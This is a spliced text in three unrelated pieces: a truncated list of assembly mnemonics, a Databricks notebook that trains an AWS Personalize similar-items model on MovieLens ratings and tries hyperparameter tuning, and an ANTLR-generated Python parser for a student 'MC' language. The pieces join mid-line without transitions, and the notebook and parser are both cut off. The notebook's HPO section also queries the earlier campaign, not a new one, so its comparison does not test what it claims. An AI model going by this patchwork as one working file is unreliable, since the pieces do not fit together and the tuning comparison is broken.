"SBC" : "subtract with carry", "SBCI" : "subtract immediate with carry", "SBCIM" : "subtract immediate multi reg", "SBCM" : "subtract multi reg with carry", "SBF" : "subtract floating point", "SBFM" : "subtract floating point multi reg", "SBI" : "subtract immediate", "SBIM" : "subtract immediate
# Databricks notebook source # MAGIC %md # MAGIC # Finding similar items + HPO # COMMAND ---------- # MAGIC %md # MAGIC This notebook follows a similar structure to the temporal holdout one, but uses aws-sims instead of HRNN. We look at the similar items found, and see if HPO helps improve things. # COMMAND ---------- import boto3, os import json import numpy as np import pandas as pd import time from botocore.exceptions import ClientError # COMMAND ---------- suffix = str(np.random.uniform())[4:9] # COMMAND ---------- bucket = "demo-sims-"+ suffix # replace with the name of your S3 bucket filename = "DEMO-sims.csv" # COMMAND ---------- !aws s3 mb s3://{bucket} # COMMAND ---------- personalize = boto3.client(service_name='personalize') personalize_runtime = boto3.client(service_name='personalize-runtime') # COMMAND ---------- # MAGIC %md # MAGIC # Download and process data # COMMAND ---------- !curl -O http://files.grouplens.org/datasets/movielens/ml-1m.zip !unzip -o ml-1m.zip # COMMAND ---------- data = pd.read_csv('./ml-1m/ratings.dat', sep='::', names=['USER_ID','ITEM_ID','RATING','TIMESTAMP']) pd.set_option('display.max_rows', 5) data # COMMAND ---------- # data = data[data['RATING'] > 3.6] # Use all data to predict view recommendations data = data[['USER_ID', 'ITEM_ID', 'TIMESTAMP']] # select columns that match the columns in the schema below print('unique users %d; unique items %d'%( len(data['USER_ID'].unique()), len(data['ITEM_ID'].unique()))) # COMMAND ---------- # MAGIC %md # MAGIC ## Upload data # COMMAND ---------- data.to_csv(filename, index=False) boto3.Session().resource('s3').Bucket(bucket).Object(filename).upload_file(filename) # COMMAND ---------- # MAGIC %md # MAGIC # Create Schema # COMMAND ---------- schema = { "type": "record", "name": "Interactions", "namespace": "com.amazonaws.personalize.schema", "fields": [ { "name": "USER_ID", "type": "string" }, { "name": "ITEM_ID", "type": "string" }, { "name": "TIMESTAMP", "type": "long" } ], "version": "1.0" } create_schema_response = personalize.create_schema( name = "DEMO-sims-schema-"+suffix, schema = json.dumps(schema) ) schema_arn = create_schema_response['schemaArn'] print(json.dumps(create_schema_response, indent=2)) # COMMAND ---------- # MAGIC %md # MAGIC ## Datasets and Dataset Groups # COMMAND ---------- # MAGIC %md # MAGIC ### Create a Dataset Group # COMMAND ---------- create_dataset_group_response = personalize.create_dataset_group( name = "DEMO-sims-dataset-group-"+suffix ) dataset_group_arn = create_dataset_group_response['datasetGroupArn'] print(json.dumps(create_dataset_group_response, indent=2)) # COMMAND ---------- status = None max_time = time.time() + 3*60*60 # 3 hours while time.time() < max_time: describe_dataset_group_response = personalize.describe_dataset_group( datasetGroupArn = dataset_group_arn ) status = describe_dataset_group_response["datasetGroup"]["status"] print("DatasetGroup: {}".format(status)) if status == "ACTIVE" or status == "CREATE FAILED": break time.sleep(20) # COMMAND ---------- # MAGIC %md # MAGIC ### Create an 'Interactions' Dataset Type # COMMAND ---------- dataset_type = "INTERACTIONS" create_dataset_response = personalize.create_dataset( datasetType = dataset_type, datasetGroupArn = dataset_group_arn, schemaArn = schema_arn, name = "DEMO-sims-dataset-"+suffix ) dataset_arn = create_dataset_response['datasetArn'] print(json.dumps(create_dataset_response, indent=2)) # COMMAND ---------- # MAGIC %md # MAGIC ## S3 Bucket Permissions for Personalize Access # COMMAND ---------- # 
MAGIC %md # MAGIC ### Attach a Policy to the S3 Bucket # COMMAND ---------- s3 = boto3.client("s3") policy = { "Version": "2012-10-17", "Id": "PersonalizeS3BucketAccessPolicy", "Statement": [ { "Sid": "PersonalizeS3BucketAccessPolicy", "Effect": "Allow", "Principal": { "Service": "personalize.amazonaws.com" }, "Action": [ "s3:GetObject", "s3:ListBucket" ], "Resource": [ "arn:aws:s3:::{}".format(bucket), "arn:aws:s3:::{}/*".format(bucket) ] } ] } s3.put_bucket_policy(Bucket=bucket, Policy=json.dumps(policy)); # COMMAND ---------- # MAGIC %md # MAGIC ### Create S3 Read-Only Access Role # COMMAND ---------- iam = boto3.client("iam") role_name = "PersonalizeS3Role-"+suffix assume_role_policy_document = { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "Service": "personalize.amazonaws.com" }, "Action": "sts:AssumeRole" } ] } try: create_role_response = iam.create_role( RoleName = role_name, AssumeRolePolicyDocument = json.dumps(assume_role_policy_document) ); iam.attach_role_policy( RoleName = role_name, PolicyArn = "arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess" ); role_arn = create_role_response["Role"]["Arn"] except ClientError as e: if e.response['Error']['Code'] == 'EntityAlreadyExists': role_arn = iam.get_role(RoleName=role_name)['Role']['Arn'] else: raise print(role_arn) # sometimes need to wait a bit for the role to be created time.sleep(45) print(role_arn) # COMMAND ---------- # MAGIC %md # MAGIC ## Dataset Import Jobs # COMMAND ---------- create_dataset_import_job_response = personalize.create_dataset_import_job( jobName = "DEMO-sims-dataset-import-job-"+suffix, datasetArn = dataset_arn, dataSource = { "dataLocation": "s3://{}/{}".format(bucket, filename) }, roleArn = role_arn ) dataset_import_job_arn = create_dataset_import_job_response['datasetImportJobArn'] print(json.dumps(create_dataset_import_job_response, indent=2)) # COMMAND ---------- # MAGIC %md # MAGIC ### Wait for Dataset Import Job and Dataset Import Job Run to Have ACTIVE Status # COMMAND ---------- status = None max_time = time.time() + 3*60*60 # 3 hours while time.time() < max_time: describe_dataset_import_job_response = personalize.describe_dataset_import_job( datasetImportJobArn = dataset_import_job_arn ) dataset_import_job = describe_dataset_import_job_response["datasetImportJob"] if "latestDatasetImportJobRun" not in dataset_import_job: status = dataset_import_job["status"] print("DatasetImportJob: {}".format(status)) else: status = dataset_import_job["latestDatasetImportJobRun"]["status"] print("LatestDatasetImportJobRun: {}".format(status)) if status == "ACTIVE" or status == "CREATE FAILED": break time.sleep(60) # COMMAND ---------- # MAGIC %md # MAGIC # Create Solution # COMMAND ---------- recipe_list = personalize.list_recipes() for recipe in recipe_list['recipes']: print(recipe['recipeArn']) # COMMAND ---------- # MAGIC %md # MAGIC There are many recipes for different scenarios. In this example, we only have interactions data, so we will choose one from the basic recipes. # MAGIC # MAGIC | Feasible? | Recipe | Description # MAGIC |-------- | -------- |:------------ # MAGIC | Y | aws-popularity-count | Calculates popularity of items based on count of events against that item in user-item interactions dataset. # MAGIC | Y | aws-hrnn | Predicts items a user will interact with. A hierarchical recurrent neural network which can model the temporal order of user-item interactions. # MAGIC | N - requires meta data | aws-hrnn-metadata | Predicts items a user will interact with. 
HRNN with additional features derived from contextual (user-item interaction metadata), user medata (user dataset) and item metadata (item dataset) # MAGIC | N - for bandits and requires meta data | aws-hrnn-coldstart | Predicts items a user will interact with. HRNN-metadata with with personalized exploration of new items. # MAGIC | N - for item-based queries | aws-sims | Computes items similar to a given item based on co-occurrence of item in same user history in user-item interaction dataset # MAGIC | N - for reranking a short list | aws-personalized-ranking | Reranks a list of items for a user. Trains on user-item interactions dataset. # MAGIC # MAGIC # MAGIC We (or autoML) can run all of these basic recipes and choose the best-performing model from internal metrics. We recommend comparisons, especially with popularity-baseline, to see the lifts in metrics via personalization. However, in this demo, we will pick one recipe - aws-sims, to illustrate smell tests. # COMMAND ---------- recipe_arn = "arn:aws:personalize:::recipe/aws-sims" # COMMAND ---------- create_solution_response = personalize.create_solution( name = "DEMO-sims-solution-"+suffix, datasetGroupArn = dataset_group_arn, recipeArn = recipe_arn, ) solution_arn = create_solution_response['solutionArn'] print(json.dumps(create_solution_response, indent=2)) # COMMAND ---------- create_solution_version_response = personalize.create_solution_version( solutionArn = solution_arn ) solution_version_arn = create_solution_version_response['solutionVersionArn'] print(json.dumps(create_solution_version_response, indent=2)) # COMMAND ---------- # MAGIC %md # MAGIC ### Wait for Solution Version to Have ACTIVE Status # COMMAND ---------- status = None max_time = time.time() + 3*60*60 # 3 hours while time.time() < max_time: describe_solution_version_response = personalize.describe_solution_version( solutionVersionArn = solution_version_arn ) status = describe_solution_version_response["solutionVersion"]["status"] print("SolutionVersion: {}".format(status)) if status == "ACTIVE" or status == "CREATE FAILED": break time.sleep(60) # COMMAND ---------- # MAGIC %md # MAGIC ### Get Metrics of Solution # COMMAND ---------- get_metrics_response = personalize.get_solution_metrics( solutionVersionArn = solution_version_arn ) print(json.dumps(get_metrics_response, indent=2)) # COMMAND ---------- # MAGIC %md # MAGIC # Create and Wait for Campaign # COMMAND ---------- create_campaign_response = personalize.create_campaign( name = "DEMO-sims-campaign-"+suffix, solutionVersionArn = solution_version_arn, minProvisionedTPS = 2, ) campaign_arn = create_campaign_response['campaignArn'] print(json.dumps(create_campaign_response, indent=2)) # COMMAND ---------- # MAGIC %md # MAGIC ### Wait for Campaign to Have ACTIVE Status # COMMAND ---------- status = None max_time = time.time() + 3*60*60 # 3 hours while time.time() < max_time: describe_campaign_response = personalize.describe_campaign( campaignArn = campaign_arn ) status = describe_campaign_response["campaign"]["status"] print("Campaign: {}".format(status)) if status == "ACTIVE" or status == "CREATE FAILED": break time.sleep(60) # COMMAND ---------- # MAGIC %md # MAGIC ## to aid in interpretation, lets look at some items # COMMAND ---------- movies = pd.read_csv('./ml-1m/movies.dat', sep='::', names=['ITEM_ID','title','genre']) # COMMAND ---------- movies=movies.set_index('ITEM_ID') # COMMAND ---------- movies.head() # COMMAND ---------- # MAGIC %md # MAGIC ### Pick a couple of items and look at if items found 
are generally of similar genres # COMMAND ---------- # MAGIC %md # MAGIC Note, the model did not use this meta-data (genre) for training, this is a sanity or smell test to see if the model discovered similar items that 'make sense' # COMMAND ---------- rec_response = personalize_runtime.get_recommendations( campaignArn = campaign_arn, itemId = str(5) ) rec_items = [int(x['itemId']) for x in rec_response['itemList']] # COMMAND ---------- movies.loc[rec_items[:5]] # COMMAND ---------- rec_response = personalize_runtime.get_recommendations( campaignArn = campaign_arn, itemId = str(2) ) rec_items = [int(x['itemId']) for x in rec_response['itemList']] # COMMAND ---------- movies.loc[rec_items[:5]] # COMMAND ---------- # MAGIC %md # MAGIC ## Do HPO # COMMAND ---------- # MAGIC %md # MAGIC We now see if doing HPO improves things # COMMAND ---------- create_solution_response = personalize.create_solution( name = "DEMO-sims-solution-hpo-"+suffix, datasetGroupArn = dataset_group_arn, recipeArn = recipe_arn, performHPO = True, solutionConfig={ 'hpoConfig': { 'hpoResourceConfig': { 'maxNumberOfTrainingJobs': '40', 'maxParallelTrainingJobs': '10' } } } ) solution_arn = create_solution_response['solutionArn'] print(json.dumps(create_solution_response, indent=2)) # COMMAND ---------- create_solution_version_response = personalize.create_solution_version( solutionArn = solution_arn ) solution_version_arn = create_solution_version_response['solutionVersionArn'] print(json.dumps(create_solution_version_response, indent=2)) # COMMAND ---------- status = None max_time = time.time() + 3*60*60 # 3 hours while time.time() < max_time: describe_solution_version_response = personalize.describe_solution_version( solutionVersionArn = solution_version_arn ) status = describe_solution_version_response["solutionVersion"]["status"] print("SolutionVersion: {}".format(status)) if status == "ACTIVE" or status == "CREATE FAILED": break time.sleep(60) # COMMAND ---------- get_metrics_response = personalize.get_solution_metrics( solutionVersionArn = solution_version_arn ) print(json.dumps(get_metrics_response, indent=2)) # COMMAND ---------- movies.head() # COMMAND ---------- rec_response = personalize_runtime.get_recommendations( campaignArn = campaign_arn, itemId = str(5) ) rec_items = [int(x['itemId']) for x in rec_response['itemList']] movies.loc[rec_items[:5]] # COMMAND ---------- rec_response = personalize_runtime.get_recommendations( campaignArn
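# COMMAND ----------

# MAGIC %md
# MAGIC Editor's sketch (not in the original notebook): the poll-until-ACTIVE loops above for the dataset group, the import job, the solution versions and the campaign all share the same shape. The helper below captures that pattern once; `describe` is any `personalize.describe_*` call and `extract_status` pulls the status string out of its response.

# COMMAND ----------

def wait_for_active(describe, extract_status, poll_seconds=60, max_hours=3):
    """Poll until the resource reports ACTIVE or CREATE FAILED."""
    deadline = time.time() + max_hours * 60 * 60
    status = None
    while time.time() < deadline:
        status = extract_status(describe())
        print(status)
        if status in ("ACTIVE", "CREATE FAILED"):
            break
        time.sleep(poll_seconds)
    return status

# Example, assuming solution_version_arn from the cells above:
# wait_for_active(
#     lambda: personalize.describe_solution_version(
#         solutionVersionArn=solution_version_arn),
#     lambda r: r["solutionVersion"]["status"])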
<filename>assignment/assignment1/main/mc/parser/.antlr/MCParser.py # Generated from /home/kraken/ppl-course/assignment/assignment1/main/mc/parser/MC.g4 by ANTLR 4.7.1 # encoding: utf-8 from antlr4 import * from io import StringIO from typing.io import TextIO import sys def serializedATN(): with StringIO() as buf: buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\3\63") buf.write("\u012f\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t\7") buf.write("\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r\4\16") buf.write("\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23\t\23") buf.write("\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30\4\31") buf.write("\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36\t\36") buf.write("\4\37\t\37\4 \t \4!\t!\4\"\t\"\3\2\3\2\6\2G\n\2\r\2\16") buf.write("\2H\3\2\3\2\3\3\3\3\3\3\3\3\3\4\3\4\3\5\3\5\3\5\7\5V\n") buf.write("\5\f\5\16\5Y\13\5\3\6\3\6\3\6\3\6\5\6_\n\6\3\7\3\7\3\7") buf.write("\3\7\5\7e\n\7\3\7\3\7\3\7\3\b\3\b\3\b\5\bm\n\b\3\t\3\t") buf.write("\3\t\3\t\3\n\3\n\3\n\7\nv\n\n\f\n\16\ny\13\n\3\13\3\13") buf.write("\3\13\3\f\3\f\3\f\5\f\u0081\n\f\3\r\3\r\3\r\7\r\u0086") buf.write("\n\r\f\r\16\r\u0089\13\r\3\r\3\r\3\16\3\16\3\16\3\16\3") buf.write("\16\3\16\3\16\3\16\5\16\u0095\n\16\3\17\3\17\3\17\3\17") buf.write("\3\17\3\17\3\17\5\17\u009e\n\17\3\20\3\20\6\20\u00a2\n") buf.write("\20\r\20\16\20\u00a3\3\20\3\20\3\20\3\20\3\21\3\21\3\21") buf.write("\3\21\3\21\3\21\3\21\3\21\3\21\3\21\3\22\3\22\3\22\3\23") buf.write("\3\23\3\23\3\24\3\24\5\24\u00bc\n\24\3\24\3\24\3\25\3") buf.write("\25\3\25\3\26\3\26\3\26\3\26\3\26\5\26\u00c8\n\26\3\27") buf.write("\3\27\3\27\3\27\3\27\3\27\7\27\u00d0\n\27\f\27\16\27\u00d3") buf.write("\13\27\3\30\3\30\3\30\3\30\3\30\3\30\7\30\u00db\n\30\f") buf.write("\30\16\30\u00de\13\30\3\31\3\31\3\31\3\31\3\31\5\31\u00e5") buf.write("\n\31\3\32\3\32\3\32\3\32\3\32\5\32\u00ec\n\32\3\33\3") buf.write("\33\3\33\3\33\3\33\3\33\7\33\u00f4\n\33\f\33\16\33\u00f7") buf.write("\13\33\3\34\3\34\3\34\3\34\3\34\3\34\7\34\u00ff\n\34\f") buf.write("\34\16\34\u0102\13\34\3\35\3\35\3\35\5\35\u0107\n\35\3") buf.write("\36\3\36\3\36\3\36\3\36\3\36\5\36\u010f\n\36\3\37\3\37") buf.write("\3\37\3\37\3\37\5\37\u0116\n\37\3 \3 \3 \3 \3 \3 \5 \u011e") buf.write("\n \3!\3!\3!\3!\3!\3\"\3\"\3\"\7\"\u0128\n\"\f\"\16\"") buf.write("\u012b\13\"\5\"\u012d\n\"\3\"\2\6,.\64\66#\2\4\6\b\n\f") buf.write("\16\20\22\24\26\30\32\34\36 \"$&(*,.\60\62\64\668:<>@") buf.write("B\2\b\3\2\7\n\3\2\37 \3\2!$\3\2\27\30\3\2\31\33\4\2\30") buf.write("\30\34\34\2\u0133\2F\3\2\2\2\4L\3\2\2\2\6P\3\2\2\2\bR") buf.write("\3\2\2\2\nZ\3\2\2\2\f`\3\2\2\2\16l\3\2\2\2\20n\3\2\2\2") buf.write("\22r\3\2\2\2\24z\3\2\2\2\26}\3\2\2\2\30\u0082\3\2\2\2") buf.write("\32\u0094\3\2\2\2\34\u0096\3\2\2\2\36\u009f\3\2\2\2 \u00a9") buf.write("\3\2\2\2\"\u00b3\3\2\2\2$\u00b6\3\2\2\2&\u00b9\3\2\2\2") buf.write("(\u00bf\3\2\2\2*\u00c7\3\2\2\2,\u00c9\3\2\2\2.\u00d4\3") buf.write("\2\2\2\60\u00e4\3\2\2\2\62\u00eb\3\2\2\2\64\u00ed\3\2") buf.write("\2\2\66\u00f8\3\2\2\28\u0106\3\2\2\2:\u010e\3\2\2\2<\u0115") buf.write("\3\2\2\2>\u011d\3\2\2\2@\u011f\3\2\2\2B\u012c\3\2\2\2") buf.write("DG\5\4\3\2EG\5\f\7\2FD\3\2\2\2FE\3\2\2\2GH\3\2\2\2HF\3") buf.write("\2\2\2HI\3\2\2\2IJ\3\2\2\2JK\7\2\2\3K\3\3\2\2\2LM\5\6") buf.write("\4\2MN\5\b\5\2NO\7-\2\2O\5\3\2\2\2PQ\t\2\2\2Q\7\3\2\2") buf.write("\2RW\5\n\6\2ST\7,\2\2TV\5\b\5\2US\3\2\2\2VY\3\2\2\2WU") buf.write("\3\2\2\2WX\3\2\2\2X\t\3\2\2\2YW\3\2\2\2Z^\7\26\2\2[\\") buf.write("\7*\2\2\\]\7\3\2\2]_\7+\2\2^[\3\2\2\2^_\3\2\2\2_\13\3") 
buf.write("\2\2\2`a\5\16\b\2ab\7\26\2\2bd\7&\2\2ce\5\22\n\2dc\3\2") buf.write("\2\2de\3\2\2\2ef\3\2\2\2fg\7\'\2\2gh\5\30\r\2h\r\3\2\2") buf.write("\2im\5\6\4\2jm\5\20\t\2km\7\13\2\2li\3\2\2\2lj\3\2\2\2") buf.write("lk\3\2\2\2m\17\3\2\2\2no\5\6\4\2op\7*\2\2pq\7+\2\2q\21") buf.write("\3\2\2\2rw\5\24\13\2st\7,\2\2tv\5\24\13\2us\3\2\2\2vy") buf.write("\3\2\2\2wu\3\2\2\2wx\3\2\2\2x\23\3\2\2\2yw\3\2\2\2z{\5") buf.write("\6\4\2{|\5\26\f\2|\25\3\2\2\2}\u0080\7\26\2\2~\177\7*") buf.write("\2\2\177\u0081\7+\2\2\u0080~\3\2\2\2\u0080\u0081\3\2\2") buf.write("\2\u0081\27\3\2\2\2\u0082\u0087\7(\2\2\u0083\u0086\5\4") buf.write("\3\2\u0084\u0086\5\32\16\2\u0085\u0083\3\2\2\2\u0085\u0084") buf.write("\3\2\2\2\u0086\u0089\3\2\2\2\u0087\u0085\3\2\2\2\u0087") buf.write("\u0088\3\2\2\2\u0088\u008a\3\2\2\2\u0089\u0087\3\2\2\2") buf.write("\u008a\u008b\7)\2\2\u008b\31\3\2\2\2\u008c\u0095\5\30") buf.write("\r\2\u008d\u0095\5\34\17\2\u008e\u0095\5\36\20\2\u008f") buf.write("\u0095\5 \21\2\u0090\u0095\5\"\22\2\u0091\u0095\5$\23") buf.write("\2\u0092\u0095\5&\24\2\u0093\u0095\5(\25\2\u0094\u008c") buf.write("\3\2\2\2\u0094\u008d\3\2\2\2\u0094\u008e\3\2\2\2\u0094") buf.write("\u008f\3\2\2\2\u0094\u0090\3\2\2\2\u0094\u0091\3\2\2\2") buf.write("\u0094\u0092\3\2\2\2\u0094\u0093\3\2\2\2\u0095\33\3\2") buf.write("\2\2\u0096\u0097\7\21\2\2\u0097\u0098\7&\2\2\u0098\u0099") buf.write("\5*\26\2\u0099\u009a\7\'\2\2\u009a\u009d\5\32\16\2\u009b") buf.write("\u009c\7\22\2\2\u009c\u009e\5\32\16\2\u009d\u009b\3\2") buf.write("\2\2\u009d\u009e\3\2\2\2\u009e\35\3\2\2\2\u009f\u00a1") buf.write("\7\f\2\2\u00a0\u00a2\5\32\16\2\u00a1\u00a0\3\2\2\2\u00a2") buf.write("\u00a3\3\2\2\2\u00a3\u00a1\3\2\2\2\u00a3\u00a4\3\2\2\2") buf.write("\u00a4\u00a5\3\2\2\2\u00a5\u00a6\7\r\2\2\u00a6\u00a7\5") buf.write("*\26\2\u00a7\u00a8\7-\2\2\u00a8\37\3\2\2\2\u00a9\u00aa") buf.write("\7\16\2\2\u00aa\u00ab\7&\2\2\u00ab\u00ac\5*\26\2\u00ac") buf.write("\u00ad\7-\2\2\u00ad\u00ae\5*\26\2\u00ae\u00af\7-\2\2\u00af") buf.write("\u00b0\5*\26\2\u00b0\u00b1\7\'\2\2\u00b1\u00b2\5\32\16") buf.write("\2\u00b2!\3\2\2\2\u00b3\u00b4\7\17\2\2\u00b4\u00b5\7-") buf.write("\2\2\u00b5#\3\2\2\2\u00b6\u00b7\7\20\2\2\u00b7\u00b8\7") buf.write("-\2\2\u00b8%\3\2\2\2\u00b9\u00bb\7\23\2\2\u00ba\u00bc") buf.write("\5*\26\2\u00bb\u00ba\3\2\2\2\u00bb\u00bc\3\2\2\2\u00bc") buf.write("\u00bd\3\2\2\2\u00bd\u00be\7-\2\2\u00be\'\3\2\2\2\u00bf") buf.write("\u00c0\5*\26\2\u00c0\u00c1\7-\2\2\u00c1)\3\2\2\2\u00c2") buf.write("\u00c3\5,\27\2\u00c3\u00c4\7%\2\2\u00c4\u00c5\5*\26\2") buf.write("\u00c5\u00c8\3\2\2\2\u00c6\u00c8\5,\27\2\u00c7\u00c2\3") buf.write("\2\2\2\u00c7\u00c6\3\2\2\2\u00c8+\3\2\2\2\u00c9\u00ca") buf.write("\b\27\1\2\u00ca\u00cb\5.\30\2\u00cb\u00d1\3\2\2\2\u00cc") buf.write("\u00cd\f\4\2\2\u00cd\u00ce\7\35\2\2\u00ce\u00d0\5.\30") buf.write("\2\u00cf\u00cc\3\2\2\2\u00d0\u00d3\3\2\2\2\u00d1\u00cf") buf.write("\3\2\2\2\u00d1\u00d2\3\2\2\2\u00d2-\3\2\2\2\u00d3\u00d1") buf.write("\3\2\2\2\u00d4\u00d5\b\30\1\2\u00d5\u00d6\5\60\31\2\u00d6") buf.write("\u00dc\3\2\2\2\u00d7\u00d8\f\4\2\2\u00d8\u00d9\7\36\2") buf.write("\2\u00d9\u00db\5\60\31\2\u00da\u00d7\3\2\2\2\u00db\u00de") buf.write("\3\2\2\2\u00dc\u00da\3\2\2\2\u00dc\u00dd\3\2\2\2\u00dd") buf.write("/\3\2\2\2\u00de\u00dc\3\2\2\2\u00df\u00e0\5\62\32\2\u00e0") buf.write("\u00e1\t\3\2\2\u00e1\u00e2\5\62\32\2\u00e2\u00e5\3\2\2") buf.write("\2\u00e3\u00e5\5\62\32\2\u00e4\u00df\3\2\2\2\u00e4\u00e3") buf.write("\3\2\2\2\u00e5\61\3\2\2\2\u00e6\u00e7\5\64\33\2\u00e7") buf.write("\u00e8\t\4\2\2\u00e8\u00e9\5\64\33\2\u00e9\u00ec\3\2\2") 
buf.write("\2\u00ea\u00ec\5\64\33\2\u00eb\u00e6\3\2\2\2\u00eb\u00ea") buf.write("\3\2\2\2\u00ec\63\3\2\2\2\u00ed\u00ee\b\33\1\2\u00ee\u00ef") buf.write("\5\66\34\2\u00ef\u00f5\3\2\2\2\u00f0\u00f1\f\4\2\2\u00f1") buf.write("\u00f2\t\5\2\2\u00f2\u00f4\5\66\34\2\u00f3\u00f0\3\2\2") buf.write("\2\u00f4\u00f7\3\2\2\2\u00f5\u00f3\3\2\2\2\u00f5\u00f6") buf.write("\3\2\2\2\u00f6\65\3\2\2\2\u00f7\u00f5\3\2\2\2\u00f8\u00f9") buf.write("\b\34\1\2\u00f9\u00fa\58\35\2\u00fa\u0100\3\2\2\2\u00fb") buf.write("\u00fc\f\4\2\2\u00fc\u00fd\t\6\2\2\u00fd\u00ff\58\35\2") buf.write("\u00fe\u00fb\3\2\2\2\u00ff\u0102\3\2\2\2\u0100\u00fe\3") buf.write("\2\2\2\u0100\u0101\3\2\2\2\u0101\67\3\2\2\2\u0102\u0100") buf.write("\3\2\2\2\u0103\u0104\t\7\2\2\u0104\u0107\58\35\2\u0105") buf.write("\u0107\5:\36\2\u0106\u0103\3\2\2\2\u0106\u0105\3\2\2\2") buf.write("\u01079\3\2\2\2\u0108\u0109\5<\37\2\u0109\u010a\7*\2\2") buf.write("\u010a\u010b\5*\26\2\u010b\u010c\7+\2\2\u010c\u010f\3") buf.write("\2\2\2\u010d\u010f\5<\37\2\u010e\u0108\3\2\2\2\u010e\u010d") buf.write("\3\2\2\2\u010f;\3\2\2\2\u0110\u0111\7&\2\2\u0111\u0112") buf.write("\5*\26\2\u0112\u0113\7\'\2\2\u0113\u0116\3\2\2\2\u0114") buf.write("\u0116\5> \2\u0115\u0110\3\2\2\2\u0115\u0114\3\2\2\2\u0116") buf.write("=\3\2\2\2\u0117\u011e\7\3\2\2\u0118\u011e\7\5\2\2\u0119") buf.write("\u011e\7\26\2\2\u011a\u011e\7\4\2\2\u011b\u011e\7\6\2") buf.write("\2\u011c\u011e\5@!\2\u011d\u0117\3\2\2\2\u011d\u0118\3") buf.write("\2\2\2\u011d\u0119\3\2\2\2\u011d\u011a\3\2\2\2\u011d\u011b") buf.write("\3\2\2\2\u011d\u011c\3\2\2\2\u011e?\3\2\2\2\u011f\u0120") buf.write("\7\26\2\2\u0120\u0121\7&\2\2\u0121\u0122\5B\"\2\u0122") buf.write("\u0123\7\'\2\2\u0123A\3\2\2\2\u0124\u0129\5*\26\2\u0125") buf.write("\u0126\7,\2\2\u0126\u0128\5*\26\2\u0127\u0125\3\2\2\2") buf.write("\u0128\u012b\3\2\2\2\u0129\u0127\3\2\2\2\u0129\u012a\3") buf.write("\2\2\2\u012a\u012d\3\2\2\2\u012b\u0129\3\2\2\2\u012c\u0124") buf.write("\3\2\2\2\u012c\u012d\3\2\2\2\u012dC\3\2\2\2\35FHW^dlw") buf.write("\u0080\u0085\u0087\u0094\u009d\u00a3\u00bb\u00c7\u00d1") buf.write("\u00dc\u00e4\u00eb\u00f5\u0100\u0106\u010e\u0115\u011d") buf.write("\u0129\u012c") return buf.getvalue() class MCParser ( Parser ): grammarFileName = "MC.g4" atn = ATNDeserializer().deserialize(serializedATN()) decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ] sharedContextCache = PredictionContextCache() literalNames = [ "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>", "'boolean'", "'int'", "'float'", "'string'", "'void'", "'do'", "'while'", "'for'", "'break'", "'continue'", "'if'", "'else'", "'return'", "'true'", "'false'", "<INVALID>", "'+'", "'-'", "'*'", "'/'", "'%'", "'!'", "'||'", "'&&'", "'=='", "'!='", "'<'", "'>'", "'<='", "'>='", "'='", "'('", "')'", "'{'", "'}'", "'['", "']'", "','", "';'" ] symbolicNames = [ "<INVALID>", "INTLIT", "FLOATLIT", "BOOLEANLIT", "STRINGLIT", "BOOLEANTYPE", "INTTYPE", "FLOATTYPE", "STRINGTYPE", "VOIDTYPE", "DO", "WHILE", "FOR", "BREAK", "CONTINUE", "IF", "ELSE", "RETURN", "TRUE", "FALSE", "ID", "ADD", "SUB", "MUL", "DIV", "MOD", "NOT", "OR", "AND", "EQ", "NE", "LT", "GT", "LE", "GE", "ASSIGN", "LB", "RB", "LP", "RP", "LSB", "RSB", "COMA", "SEMI", "CMTLINE", "CMTBLOCK", "WS", "UNCLOSE_STRING", "ILLEGAL_ESCAPE", "ERROR_CHAR" ] RULE_program = 0 RULE_var_declare = 1 RULE_prim_type = 2 RULE_varlist = 3 RULE_var = 4 RULE_func_declare = 5 RULE_func_type = 6 RULE_arraytype = 7 RULE_paralist = 8 RULE_paradcl = 9 RULE_para = 10 RULE_blockstmt = 11 RULE_stmt = 12 RULE_if_stmt = 13 
RULE_while_stmt = 14 RULE_for_stmt = 15 RULE_break_stmt = 16 RULE_continue_stmt = 17 RULE_return_stmt = 18 RULE_expr_stmt = 19 RULE_expr0 = 20 RULE_expr1 = 21 RULE_expr2 = 22 RULE_expr3 = 23 RULE_expr4 = 24 RULE_expr5 = 25 RULE_expr6 = 26 RULE_expr7 = 27 RULE_expr8 = 28 RULE_expr9 = 29 RULE_operands = 30 RULE_calfunc = 31 RULE_arglist = 32 ruleNames = [ "program", "var_declare", "prim_type", "varlist", "var", "func_declare", "func_type", "arraytype", "paralist", "paradcl", "para", "blockstmt", "stmt", "if_stmt", "while_stmt", "for_stmt", "break_stmt", "continue_stmt", "return_stmt", "expr_stmt", "expr0", "expr1", "expr2", "expr3", "expr4", "expr5", "expr6", "expr7", "expr8", "expr9", "operands", "calfunc", "arglist" ] EOF = Token.EOF INTLIT=1 FLOATLIT=2 BOOLEANLIT=3 STRINGLIT=4 BOOLEANTYPE=5 INTTYPE=6 FLOATTYPE=7 STRINGTYPE=8 VOIDTYPE=9 DO=10 WHILE=11 FOR=12 BREAK=13 CONTINUE=14 IF=15 ELSE=16 RETURN=17 TRUE=18 FALSE=19 ID=20 ADD=21 SUB=22 MUL=23 DIV=24 MOD=25 NOT=26 OR=27 AND=28 EQ=29 NE=30 LT=31 GT=32 LE=33 GE=34 ASSIGN=35 LB=36 RB=37 LP=38 RP=39 LSB=40 RSB=41 COMA=42 SEMI=43 CMTLINE=44 CMTBLOCK=45 WS=46 UNCLOSE_STRING=47 ILLEGAL_ESCAPE=48 ERROR_CHAR=49 def __init__(self, input:TokenStream, output:TextIO = sys.stdout): super().__init__(input, output) self.checkVersion("4.7.1") self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache) self._predicates = None class ProgramContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def EOF(self): return self.getToken(MCParser.EOF, 0) def var_declare(self, i:int=None): if i is None: return 